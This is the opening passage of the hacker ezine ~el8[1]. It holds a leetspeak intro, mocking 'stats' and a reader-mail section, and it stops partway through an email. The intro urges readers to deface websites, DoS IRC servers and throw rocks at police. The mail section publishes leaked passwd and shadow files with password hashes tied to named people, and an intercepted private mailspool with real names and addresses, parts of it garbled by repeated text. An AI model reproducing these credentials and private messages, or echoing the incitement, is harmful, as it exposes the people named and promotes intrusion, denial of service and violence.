Copy Link
Add to Bookmark
Report
el8.1
#!/bin/sh
################################################
##::::::::::::::::::::::::::::::::::::::::::::##
##:'####::::::'########:'##::::::::'#######:::##
##'## ##:'##: ##.....:: ##:::::::'##.... ##::##
##..::. ####:: ##::::::: ##::::::: ##:::: ##::##
##:::::....::: ######::: ##:::::::: #######:::##
##:::::::::::: ##...:::: ##:::::::'##.... ##::##
##:::::::::::: ##::::::: ##::::::: ##:::: ##::##
##:~el8[1]:::: ########: ########:. #######:::##
##::::::::::::........::........:::.......::::##
################################################
## the definitive src for the Haiti H/P Scene ##
################################################
## do "sh <ISSUE_NAME>" to extract eldump.c ##
## compile eldump.c and use it to extract ##
## the rest of the codes ##
## el8@press.co.jp ##
## <*> el8.n3.net ##
## <*> packetstorm.securify.com/mag/~el8/ ##
################################################
cat <<'-+-+'> /dev/null
[BOI]
__________________________________________________
.-' t4blE ()f h0lY w4R3z `-.
| -------------------- |
|[01] : intr0 |
|[02] : st4tz |
|[03] : ~el8 l00pb4q |
|[04] : l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz |
|[05] : a w4lk d0wn mem0ry l4me |
|[06] : the0 de f4agdt |
|[07] : f1n.c (Uses LibNET :) |
|[08] : banner adv1sory |
|[09] : identd kill |
|[10] : testsyscall adv1sory |
|[11] : rm -rf / sh3llk0dez |
|[12] : slowscan (evasive ids scanner) |
|[13] : putpenis.c |
|[14] : THE UNIX VIRUS CHILDRENS MANUAL |
|[15] : SUPER CODE R1PP1NG (CONT3ST) |
|[16] : M4IL B0MB3R |
|[17] : un1x f1le m4g1c |
|[18] : ~el8ch4t |
|[19] : s1lly m4kr0z |
|[20] : qu1k3st f0rkb0mb in the w3st |
|[21] : w4r3z t4lk3r us1ng AI |
|[22] : me.c |
|[23] : un1x p4ssw0rd ste4l3r det3kt0r |
|[24] : leet_talker.c |
|[25] : 8ball |
|[26] : ELDUMP / ELTAG |
|[27] : Closing w0rdz |
`-.__________________________________________________.-'
.-' ~el8 R&DVDA te4m `-.
| ---------------- |
| S1LLYG00S3 : le4der by f()rc3 |
| FUNNY_BUNNY : g4yt3 ke4p3r |
| M4ZT3RF4GST3R : BL1NG BL1NG |
| 3nr1c0 : 3nr1c0 w4r3z t1t0 |
| r3dpubEz : R3D_PUB1C_H4IR |
| tGbB : th3 g4y be4r br3w3ry |
| cc : c4w c4w! |
| lt : LKM T1TO |
| mfqr : M0THERFUKR |
| Kg : K3NNY G. |
| ch1r0d : CH1N0 R0DR1GUEZ |
| gD : g0sh d4rn1t |
| movl : M0V3 L0NG |
| tmoL : tmoLLie |
| vari0uz du0d : 0n3 v4ri0uz du0d |
| tROD : t1no r0dr1guez |
`-.__________________________________________________.-'
_______________________
.-' `-.
[01]| intro |[01]
[01]| by: |[01]
[01]| ~el8 |[01]
`-._______________________.-'
[31338]:
~el8 - ph0r & by fukn l4m3rz. peri0d.
[31338]:
y0, wh4t the fuk. ~el8 iz taken over the sk3n3. 1tz th3
n3w r1ch4rd ge4rz (ye4rz) extr4v4g4nz4! w3 w4nt ye4r 2001
t0 g3t k1q st4rt3d r1ght. s0 w3 pres3nt u w1th ~el8[1], the
sequ4l t0 ~el8[0].
[31338]:
w3 w4nt y0u, 0ur re4dersh1p, t0 t4g y0r h4kr alias3s all 0v3r
the pl4net. spr4y p4int the fuk 0ut 0f w4llz, build1ngz, s1dew4lkz,
bl1nd pe0ple, p0rt0 p0ttyz, and anyth1ng else u k4n th1nk 0f. d0nt
f0rg3t 1tz n1ce t0 le4ve gr34tz t0 ~el8. thr0w r0kz @ k0pz. burn
h4rry p0ttr and 2600 m4g4z1nez at ur l0c4l bo0k st0re. thr0w r0kz
@ ph3dz. d3f4ce as m4ny s1tez as p0ssible. us3 k1ll pres1d3nt 1n
ev3ry s3nt3nce 0n irc. DoS as m4ny irc s3rv3rz az u p0ssibly k4n.
p0st t0nz 0f bullshyt t0 every pr0gr4m / p4p3r 0n securityfocus
H4H4H4. g0t0 church. g0t0 nyc 0r wh3r3ver the fuk mtv TRL iz, and
d0 as i st4ted b4, st4rt chuqn r0kz at them m0thrfukrz. g0t0
sp0rt1ng ev3ntz and w4ve ~el8 po4st3rz. dur1ng spr1ng bre4k h4ve
s3x in public. h4ve s3x in public @ defc0n. d0nt we4r c0nd0mnz.
[31338]:
~el8 t4k1ng 0ver the w0rld in the 2001. the ab0ve h4z been 0ur
n3w ye4rz res0luti0nz, we le4ve 1t up t0 y0u t0 ab1de by th3z
st4nd4rdz.
[31338]:
y0u c0uld pr0lly f1nd s0me g00d spr4y p4int at h0me dep0t
(th0ze fuqz putz Ha1t1 H0me H4rdw4re oUt 0f b1zn3ss). y0u
c0uld d0 s0me ne4t shyt w1th an air brush, but th4tz k1nda expensive.
spr4y p4intz usu4lly c0sts $4. wh3n thr0w1ng r0kz at wh0mever /
wh4tever, be sure th4y ar3nt d1rt r0kz, k0z th0z w1ll juzt bre4k up
up0n imp4ct. c0r4l iz a v3ry f4ncy r0k we4p0n, s0 iph u k0uld g3t
ur h4ndz 0n s0me k0r4l ur in luq. us3 2-3 inch r0kz s0 th4t u k4n
relo4d r4th3r quikly. ph0r def4c1ng s1tez u k4n f1nd m0st 0f ur
skr1ptz 0n p4ck3tst0rm. i'd pr3f3r th4t u guyz d0s efnet, d4ln3t,
or undern3t. iph u g0 st0n1ng at TRL, b sure t0 h1t k4rs0n f4ggy
f0r me, h3z my b0y.
[31338]:
0ne k4n easily n4vig8 th1z ezine by d0ing s0 in vi:
?by:
[31338]:
enj0y the ez1ne mfqr.
______________________
.-' `-.
[02]| st@z |[02]
[02]| by: |[02]
[02]| ~el8 |[02]
`-.______________________.-'
[kdu0dz] -> BoW
[ldu0dz] -> Bugtraq, IRC
[~el8_official_whiteh@_k1ll1ng_utility] -> crowb4r
[~el8_official_p0rn_s1te] -> www.al4a.com/links
[~el8_official_BBS] -> 1-800-FAT-GIRLS
[~el8_official_lamest_du0d_on_the_inet] -> vade79 (v9)
[~el8_official_lamest_k0de_on_the_inet] ->
http://www.low-level.net/code/massres.c
[~el8_official_lamest_text_on_the_inet] ->
http://packetstorm.securify.com/groups/r00tabega/stealthcode.txt
[~el8_official_lamest_group_on_the_inet] ->
hhp (#hhp@efnet:hhp-programming.net)
[~el8_official_lamest_du0dz_on_the_inet] -> Chris Evans, lcamtuf
[~el8_official_rm_this_box_get_k0dez] -> www.netcat.it
[~el8_official_DoS_this_box_get_propz] -> www.netcat.it
[~el8_official_surv1v0r] -> Elian (viva la revolucion)
[~el8_official_pr3z1d3nt_3l3ct] ->
Ralph Nader (only one who knows his shit)
[~el8_official_snack_food] -> Graham Crackorz
[~el8_official_hair_removal_product] -> Nadz
[~el8_official_m0r0n] ->
George Walker Bush (th1s du0d c4nt ev3n r34d)
______________________
.-' `-.
[03]| ~el8 l00pb4q |[03]
[03]| by: |[03]
[03]| ~el8 |[03]
`-.______________________.-'
th1s iz wh3re u, 0ur f4nz, c4n s3nd us t0nz 0f ko0l shyt t0
put in ~el8. unf0rtunatly, h4rdly any1 em4ilz us, but a f3w
el8 people d0. m0st 0f 0ur em4il c0nsistz 0f h4rry p0tter
adv3rt1sem3ntz and x00m membersh1p upd8z. h3r3 y0u w1ll f1nd:
[1] th3 inf4m0us obsd ssg s3x ch4rt
[2] l4m3rz zgv tr0j4nd passwd f1l3z (fe4tur1ng Mixter'z!)
[3] jennicide'z mailspo0l :[
[4] h4g1s.irc
[BEGIN_DIR] l00pb4q
[1] -> ********************************************** <- [1]
[1] -> phr0m some 0ne wh0 w1shes t0 r3m4in an0nym0us: <- [1]
[1] -> ********************************************** <- [1]
[CUT_HERE] obsd-ssg.sexchart
The SSG/team OpenBSD sex chart
.----------bind---------.
| .---'|`----------|--------.
| | | | |
| | cripto----de raadt---obecian
aempirei | || .---'|`------.|
| | || | | ||
|.-----|---'| | jethro ||
|| | | | ||
|| `--route----|-------------'
|| | | |
||.---lore--|------|--------. |
||| | | | |
#hackphreak `---dangergrl `--halflife
[END_CUT] obsd-ssg.sexchart
[2] -> ***************** <- [2]
[2] -> phr0m l4m3 mfqrZ: <- [2]
[2] -> ***************** <- [2]
[CUT_HERE] lamerz
From: Mixter <mixter@newyorkoffice.com>
X-Sender: mixter@ghost.net
To: realel8@aol.co.jp
X-Spam-Rating: 209.85.120.230 1.6.2 0/1000/N
X-DPOP: DPOP Version 2.8b
Subject: Merry Warez
root:x:0:0:root:/root:/bin/bash
sys:x:0:0:sys:/:/sbin/sash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
postgres:x:100:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mixter:x:500:500::/home/mixter:/bin/bash
p0rn:x:501:501::/terabyte-hd/p0rn/animal:/bin/bash
egg:x:502:502::/home/egg:/bin/bash
root:u2rrACA3VC5z2:10995:0:99999:7:-1:-1:134530364
sys:TtKXmwWJN9aq2:10985:0:99999:7:::
bin:*:10985:0:99999:7:::
daemon:*:10985:0:99999:7:::
adm:*:10985:0:99999:7:::
lp:*:10985:0:99999:7:::
sync:*:10985:0:99999:7:::
shutdown:*:10985:0:99999:7:::
halt:*:10985:0:99999:7:::
mail:*:10985:0:99999:7:::
news:*:10985:0:99999:7:::
uucp:*:10985:0:99999:7:::
operator:*:10985:0:99999:7:::
games:*:10985:0:99999:7:::
gopher:*:10985:0:99999:7:::
ftp:JuEwpPp.1rKkE:10985:0:99999:7:::
nobody:*:10985:0:99999:7:::
postgres:!!:10985:0:99999:7:::
mixter:08z9S0RnBlXKc:10995:0:99999:7:-1:-1:134529876
p0rn:yHldGIeOf/Onc:10985:0:99999:7:::
egg:sTJD7W.rWOtwo:10985:0:99999:7:::
From: maniac1@techlab.bia-bg.com
To: realel8@aol.co.jp
Subject: Merry Warez
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:102:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
postgres:x:101:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
squid:x:102:234:squid:/var/spool/squid:
dex:x:500:500:Dexter Burned:/home/dex:/bin/bash
ufo:x:501:501::/home/ufo:/bin/bash
ndd:x:502:502::/home/ndd:/bin/bash
celi:x:503:503::/home/celi:/bin/bash
pzh:x:504:504::/home/pzh:/bin/bash
be2to:x:505:505::/home/be2to:/bin/bash
pil:x:506:506::/home/pil:/bin/bash
did:x:507:507::/home/did:/bin/bash
maniac1:x:508:508::/home/maniac1:/bin/bash
ender:x:509:509::/home/ender:/bin/bash
ilian:x:510:510::/home/ilian:/bin/bash
lomsky:x:512:512::/home/lomsky:/bin/bash
egg:x:513:513::/home/egg:/bin/bash
toni:x:514:514::/home/toni:/bin/bash
alias:x:515:515::/var/qmail/alias:/bin/bash
qmaild:x:516:515::/var/qmail:/bin/bash
qmaill:x:517:515::/var/qmail:/bin/bash
qmailp:x:518:515::/var/qmail:/bin/bash
qmailq:x:519:516::/var/qmail:/bin/bash
qmailr:x:520:516::/var/qmail:/bin/bash
qmails:x:521:516::/var/qmail:/bin/bash
nss:x:522:522::/home/nss:/bin/bash
From: majestic@area51.acidnet.org
To: realel8@aol.co.jp
halt:x:7:0:halt:/sbin:/sbin/halt
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0::/root:/bin/bash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
sync:x:5:0:sync:/sbin:/bin/sync
bin:x:1:1:bin:/bin:
ftp:x:404:1::/home/ftp:/bin/false
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
mail:x:8:12:mail:/var/spool/mail:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
man:x:13:15:man:/usr/man:
games:x:12:100:games:/usr/games:
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:65534:100:nobody:/dev/null:
majestic:x:1000:100:,,,:/home/majestic:/bin/bash
hobo:x:1001:100:,,,:/home/hobo:/bin/bash
krill:x:1002:100:,,,:/home/krill:/bin/bash
sr:x:1003:100:,,,:/home/sr:/bin/bash
intense:x:1004:100:,,,:/home/intense:/bin/bash
kraze:x:1005:100:,,,:/home/kraze:/bin/bash
caddis:x:1008:100:,,,:/home/caddis:/bin/bash
ez:x:1009:100:,,,:/home/ez:/bin/bash
pic:x:1010:100:,,,:/home/pic:/bin/bash
rapid:x:1011:100:,,,:/home/rapid:/bin/bash
To: realel8@aol.co.jp
From: * Ich bin zur Auslese zum Lesen von Schei?e * <xet@hell.net>
Subject: Merry Warez
root:x:0:0:root:/root:/bin/tcsh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
amd:*:0:0::/home/amd:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
postgres:x:100:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
XeT:x:500:500:* I'm too elite to read shit *:/home/XeT:/bin/tcsh
c0redump:x:501:506::/home/c0redump:/bin/bash
vlad:x:502:507::/home/vlad:/bin/bash
staff:x:503:508::/home/staff:/bin/bash
xet:x:504:509:* Ich bin zur Auslese zum Lesen von Scheiße *:/home/xet:/bin/tcsh
gdm:x:42:42::/home/gdm:/bin/bash
squid:x:101:101::/var/spool/squid:/dev/null
xfs:x:102:102:X Font Server:/etc/X11/fs:/bin/false
caaa:x:505:510::/home/caaa:/bin/bash
steve:x:506:511::/home/steve:/bin/false
caca:x:507:512::/home/caca:/bin/noshell
lala:x:666:666::/home/lala:/bin/bash
mavzz:x:667:667::/home/mavzz:/bin/tcsh
ext2:x:668:668::/home/ext2:/bin/bash
teespy:x:669:669::/home/teespy:/bin/bash
cucumber:x:670:670::/home/cucumber:/bin/bash
smc0:x:671:672::/home/smc0:/bin/bash
[END_CUT] lamerz
[3] -> ************************ <- [3]
[3] -> phr0m some0ne an0nym0us: <- [3]
[3] -> ************************ <- [3]
[CUT_HERE] jennicide.mailspool
From: "Jordan S" <xxxxxxxx@xxxxxxx.xxx>
To: <nin@dol.net>
Subject: jen!
Date: Mon, 5 Jan 1998 22:49:43 -0600
hey jen, this is a poem i wrote a long time agao, its kinda of messed cause i w
as messed up at the time, but anyways here it is.
your favorite fanzine, cheezy toilet paper presents a short storie by jordan s.
Hows B.J. Armstong
------------------------------
- Long agao in a palce not so far away, there lived a boy, yes a boy. a boy
so caught in a failing cavern of life. alone, cold, very burnt. a need filled
this boy. filled his veins, pumping through excelerating the world, and space.
a quest, the journy to find element and ingredients, people across total to
come to. a person, a partner. left long ago, forgottin in a forein land,
another time, place & goal. the cavern was deep & dark, empty, sucked empty by
many who passed. they who still remained grope & pick at him, naw & chew,
grate him, drag him deeper. losing his grip, lossing his mind, lossing his
heart & soul. chilling them, killing off the uneasy. wasted he left himself
and wanderd in another. to see himself lost from above. his need grew to find
a person to fill the gap left by many. himself and wanderd in another. to see
himself lost from above. his need grew to find a person to fill the gap left
by many. himself and wanderd in another. to see himself lost from above.
his need grew to find a person to fill the gap left by many. his open arms
open for years to all that grows & all ponders fields. not long after he lost
his all & oh so many times he had. a nice sweet young girl strode his scene.
she sliced his failing body, and ground his ailing guts, she rolled him up and
sewed his heart. now he was new & great.
his need still there, brewing vastly, he & she sat. the girl now sobbing, left
him to find what he was seeking. in along swipe of his finger he erased the
existance that once was, he replaced all with what was to be. a small tunnel
of a past existance still in the distance became impossible to enter. so he
brushed it away as what once would have been. he thrust his self onto the
people, in there minds a maze of racing lights and activity. growing spirits
and achieving life. he gew through there roots as they were once his. out the
gate into the open, he picked a small flower. breaking the crust slighty, his
quest rekindled, his mind open, his renewed sence-ability acheived. not so
lost, this boy, his game, his right had a seat still open!
there, this poem/story isnt the greatest. just thought u should read it !
love
jordan
From: "Jordan S" <xxxxxxxx@xxxxxx.xx>
Subject: here..
Date: Mon, 5 Jan 1998 22:56:49 -0600
hi, i just feel like spilling out whatever comes outta my mind, i hope u dont
think im some kinda sicko or whatever :P but anyways here it goes...
Hello is a word you say to a person when they arrive. Good-bye is a word you
say to a person when they leave, but what do you say to a person when they are
born, and what to you say to a person when the die?
You can't say hello, and you can't say good-bye, because to be born and to
die is far more important.
Do you say, Welcome in the world and I'll see you in the after world. Or do
you say, Good luck in life and I<92>ll miss you forever?
Or maybe you say, You<92>re are so precious and Why did you have to go?
Why is it so hard to find the words you mean to say at the most important
times in your life.
Once again I ask, what do you say to a person when they<92>re born, and what
do you say to a person when they die?
Maybe three litou say to a person when they<92>re born, and what do you say to
a person when they die?
Maybe three little words is the answer to both questions.
What do you say? You say: I Love You
love
jordan
From: "Jordan S" <xxxxxxxx@xxxxxxxxxxx.xx>
To: <nin@dol.net>
Subject: hi
Date: Mon, 5 Jan 1998 22:59:30 -0600
What is love? To some people its everything. To others it means nothing. To
me it's the world.
Love isn't a word to be taken lightly.It's a word to be tendered and cherished.
To be careful. To stand behind it's meaning.
Love is different to everyone. Love is not just a word. Love is not to be
taken advantage of. Love is a mystery like magic. It happens and can't be
explained. Love can be painful, yet beautiful when held. Love, Love.
Love is the most beautiful thing in the world.
Love, Love. Love is the most beautiful thing in the world.
love
jordan
From: "Jordan S" <xxxxxxxx@xxxxxxxxxxx.xxx>
To: <nin@dol.net>
Subject: here
Date: Mon, 5 Jan 1998 23:03:34 -0600
hi jen its me again, anyways i wrote this yesturday night when i was upset and
once again im sorry for hurting you.
I sit here alone feeling empty and lonely. I think of you often wondering how
you are, what you are doing..wishing I could hold you.
At times I tell myself--I am strong and the time will pass quickly.
Yet at other times I sit and cry and wonder why love must be this way. Though
somewhere in the emptiness I find myself feeling very loved and I realize that
it's not the loving that hurts so much--It's being without you.
find myself feeling very loved and I realize that it's not the loving that
hurts so much--It's being without you.
love
jordan
From: "Jordan S" <xxxxx@xxxxxxxx.xxx>
To: <nin@dol.net>
Subject: hi!
Date: Mon, 5 Jan 1998 23:12:20 -0600
jen,
anyways, those are all the poems i have found so far. i have lost so many and i
wish i havnt, because i wanted to share them with someone, and never had the
guts to or never did. i hope you like them. like i said you mean lots to me,
and hopefully you belive what i say. if you wish to share some of your poems or
whatever or decide to emailou mean lots to me, and hopefully you belive what i
say. if you wish to share some of your poems or whatever or decide to emailou
mean lots to me, and hopefully you belive what i say. if you wish to share some
of your poems or whatever or decide to email me back. my email u can email me
atis shanifer@hotmail.com please email me back id appricate it! thanks! see you
love lots
jordan
From: "Jordan S" <xxxxxxxx@xxxxxx.xxx>
To: <nin@dol.net>
Subject: here...
Date: Tue, 6 Jan 1998 22:07:11 -0600
well im bored so im going to try writing you another poem since you like poems
and all.. here it goes...
I promise to give you the best of myself and to ask of
you no more than you can give promise to accept you the way you are
and I wont try to reshape you in a different image.
I promise to respect you as a person with your own interests, desires and
needs, and to realize that those are sometimes different but no less
important then my own.
I promise to grow along with you, to be willing to
change in ord are sometimes different but no less important then my own.
I promise to grow along with you, to be willing to change in ord are sometimes
different but no less important then my own.
I promise to grow along with you, to be willing to change in order to keep our
relationship alive and exciting.
And finally, I promise to love you, in good times and in bad, with all that I
have to give and all that I feel inside, completely and forever.
love
jordan
From: "Jordan S" <xxxxx@xxxxxxxx.xxx>
To: <nin@dol.net>
Subject: love at first sight
Date: Wed, 7 Jan 1998 21:05:30 -0600
Do I believe in love at first sight?
Forgive the laugh, but the question is so naive!
Youthful fancies hardly encompass the complexities of mature relationships.
True, you are quite beautiful, but one cannot know true inner beauty at first
glance. It's much deeper and takes time to be revealed.
Your skin is perhaps softer than the flowing foam of some gently murmuring
distant shore, but what of it?
That's not love.
I do notice that your hands are more graceful than a ballet of swaying boughs
and your laughter a dance of dappled sunlight.
And in your eyes are glimmering pools of joy and tenderness, warm swirls of
innocence and passion, playfulness and understanding.
And in your eyes, Beauty laughs and plays and sings and calls my name.
And Trust with Caution pleads and cooing Passion intervenes, and Grace extends
her open arms, and I surrender silently.
But love at first sight? How can it be?
love
jordan
From: "Jordan S" <xxxxx@xxxxxxxxx.xxx>
To: <nin@dol.net>
Subject: a gift from heaven
Date: Thu, 8 Jan 1998 21:45:59 -0600
A Gift From Heaven
I was blessed by God
when he sent an angel down
from Heaven you came
and there you were found
with your beauty so divine
and your soul so sweet
it can make a grown man cry
and bring the strong to their knees.
You are a gift from Heaven
with nd your soul so sweet
it can make a grown man cry
and bring the strong to their knees.
You are a gift from Heaven
with nd your soul so sweet
it can make a grown man cry
and bring the strong to their knees.
You are a gift from Heaven
with a golden bow
with love that stays strong
through sleet and snow.
With you I am whole,
and I think it's meant to be,
I cannot thank God enough
for this miracle He's given to me.
love
jordan
Date: Fri, 09 Jan 1998 23:00:15 -0800
To: nin@dol.net
From: Stephen <ex1@lightspeed.net>
Hi "hun", did you have a good nights sleep?
You know, I can't stop thinking about you. See you tomarrow maybe.
Luv ya
Blackblade
From: The PBX Phreak <pbx@caffeine.induced.insomnia.org>
To: nin@dol.net
Subject: hey
hi sweetie.. how are you doing... just checkin up on ya :) .. havent seen
you on irc lately.. well thats bout it for me.. write back.. *hug*
The PBX Phreak
pbx@insomnia.org
http://www.insomnia.org/~pbx
From: "Jordan S" <xxxxx@xxxxxxxxxx.xxxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:20:42 -0600
Transcending all the standards,
ignoring the norms,
I am drawn to you.
I see beyond your appearance,
far enough to se
Transcending all the standards,
ignoring the norms,
I am drawn to you.
I see beyond your appearance,
far enough to se
Transcending all the standards,
ignoring the norms,
I am drawn to you.
I see beyond your appearance,
far enough to see your soul.
Timeless,
ageless,
I fell in love.
From: "Jordan S" <xxxxxx@xxxxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:23:16 -0600
Oh tortured heart!
A tease, a moment,
only to be torn apart,
are these the tricks
fate plays on the bored minds
and bodies,
tantalized by feelings of
newly revived sensations.
Minds,
confused by thoughts and
questions rebounding off each other
from sheer number,
fear not.
The next concentration is
just around the bend.
From: "Jordan S" <xxxxxxxx@xxxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:31:41 -0600
In the absence of light
we lie together in this small room,
I reach out my uncertain fingers
to touch the darkness of your face,
In this moment of perfection.
Somehow,
we have fallen together,
fallen without remorse
in a house of lost desires,
then let this house be our church,
undefiled by dead Gods,
and our broken angles,
twisting without words in the silent wind,
and what I have seen
in the shadows of your ephemeral face,
words without lips falling
too easily from your fingers,
your eyes,
I have seen
in the shadows of your ephemeral face,
words without lips falling
too easily from your fingers,
your eyes,
I have seen
in the shadows of your ephemeral face,
words without lips falling
too easily from your fingers,
your eyes,
the smooth silence of your skin
moving beneath my newborn hands,
I disappear into your darkness.
I do not know what I have found.
From: "Jordan S" <xxxxxxxxxx@xxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:34:39 -0600
Whether memory persists,
if we do not recall it
is uncertain,
but reality certainly
does not exist
until we observe it.
I think reality
does not exist
until we deserve it.
From: "Jordan S" <xxxxxxxxx@xxxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:41:19 -0600
You see parts of me,
no one else could see.
You are good and kind,
with an intelligent mind.
So, why me?
What do you see,
that nobody else can see?
I find myself thinking of you
from time to time.
You make me feel special.
You seem to have crept past my defenses -
into my heart.
I want to believe in you,
it would be so easy,
but all my life
there's been nobody but me
to hels -
into my heart.
I want to believe in you,
it would be so easy,
but all my life
there's been nobody but me
to hels -
into my heart.
I want to believe in you,
it would be so easy,
but all my life
there's been nobody but me
to help me over the hurdles
that I've encountered.
Nobody has ever cared enough
to say "Let me help you."
When I've been afraid
and I would cry,
I've always been alone in the dark,
nobody to rescue me from my own fears.
I've had enough tears -
I don't want to cry alone in the dark anymore.
It is easier not to care to much,
so you don't have hurt so much.
You stand there and say,
"Give me a chance,"
how can I?
You want me to take your hand.
How can I?
I'm so afraid of where you will lead me!
From: "Jordan S" <xxxxxxxx@xxxxxxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:39:19 -0600
It's the time of the end my friend.
Laughter and tears have come and gone.
Where have they gone?
My memory tells me we have shared it all.
Now time seems to have changed it all.
Yet I can still remember,
our petty fights,
terrified sighs,
and tearful goodbye's.
The images seem to fly through my mind,
you and I laughing
at a secret known only to us.
I look again and seem to see
each and every change we made along the way.
I can still remember
who we used to be.
Somewhere along the way,
we left one another behind
on our way to a different place.
Goodbye's are never easy,
but always seem to be inevitable.
From: "Jordan S" <xxxxxx@xxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Sun, 11 Jan 1998 13:57:36 -0600
In the darkness night
I search for you
your gentle voice
a soft caress
Your voice soothes me
like the rolling ocean tide
your touch warms me
like the kisses from the sun
Come to me my heart
shelter me from the loneliness
let all my sorrows disappear
with the tenderness of your kiss
You heal me
like the sun after rain
your lips a balm
that soothes away my pain
Hold me close my love
Safe in your embrace
lost in the moments
til the darkness fades to light
From: "Jordan S" <xxxxxxxxxx@xxxxxxxx.xxx>
To: <nin@dol.net>
Subject: .
Date: Wed, 21 Jan 1998 12:47:07 -0600
i will not say goodbye again
we have said it too many times, the words are too strong
too sorrowing and though i've meant it each and every time
i cannot go away forever i will not say until we meet again
because i have grown tired of breaking
promises to you and to myself i will only say
(if i think i can handle seeing you and circumstances permitand if i
can't bear not seeing you and i think i can stay meand you stay you,
i will joyfully touch my lips to yours andarms will hold and skin to skin
friends the words will sing)
or
i love you.
From: "Chris McCoy" <chris@unixnet.org>
To: "JenniCide" <nin@dol.net>
Subject: hey
Date: Tue, 27 Jan 1998 17:58:48 -0500
hey sweetie.. hows life.. well hope you reply to my email.. last time you
didnt.. :( .. well just checkin up on you... well have phun (this is
pbxphreak by the way)
Chris McCoy
chris@unixnet.org
Date: Sun, 01 Feb 1998 20:37:16 +0100
From: Thibault LHEURE <tlheure@hol.fr>
To: nin@dol.net
Subject: Hi, girl !
Hi, Jenny (is your real name Jenny ?)
How are you ? It's Cybertob. Victor called me five minutes ago and said you wer
e on
the IRC. Your nick is here but I've no answer, I think you are deconnected.
I hope we'll talk together soon.
Here's my e-mail : tlheure@hol.fr
Love from
Cybertob
From: "Chris McCoy" <chris@unixnet.org>
To: "JenniCide" <nin@dol.net>
Subject: hey
Date: Mon, 2 Feb 1998 08:35:15 -0500
hey sweetie.. its me pbx.. well just thought i would send you some mail..
and stuff.. well i will be calling you today at 4pm..ey sweetie.. its me pbx..
well just thought i would send you some mail..
and stuff.. well i will be calling you today at 4pm..ey sweetie.. its me pbx..
well just thought i would send you some mail..
and stuff.. well i will be calling you today at 4pm.. talk to you then...
*hug* *smooch*
Chris McCoy
chris@unixnet.org
Date: Mon, 09 Feb 1998 23:02:18 +0100
From: Thibault LHEURE <tlheure@hol.fr>
To: nin@dol.net
Subject: still waiting for you...
Hi, this Cybertob i'm still waiting for news...
What are you doing ?
See you later (I hope)
You're always in my heart.
You will receive soon a mail from totor (a friend who was with me
when we chatted.)
Bye
Date: Sat, 14 Feb 1998 20:37:08 +0000
From: broken- <broken@caughq.org>
To: jennie@magpage.com
Subject: :o)
Okay.... I just want you to know if you already didnt that I care for
your deeply..
It's werid cuase I beleive in all that destany stuff an like I dont know
but thier is a reason why we met.
Maybe were gonna be important players in life later never know or maybe
were gonna save each other from our fear and problems.
But for some reason we are somthing. :o) But On this valitnes day I
always look at wut i have an take it for wut i have this
valentines day is for more special then anything else I dont know what
you think of me personally.
But i'm like so in love with you you dont know but nnnow i'm telling you
:o)
For example if something happend to yuo ially.
But i'm like so in love with you you dont know but nnnow i'm telling you
:o)
For example if something happend to yuo ially.
But i'm like so in love with you you dont know but nnnow i'm telling you
:o)
For example if something happend to yuo i would be in deleware almost
instantly. It's like i would sacrafice my own life for yours.
Strange to say in our world where people aree so selfish , but to say I
would give my life for you to live is something i really cant explain.
It's weird. Life's werid. I arranged for something to be sent to you i
hope you get it.. :o) If not i'll see wut else i can do :o)
But anyways getting back to the point.
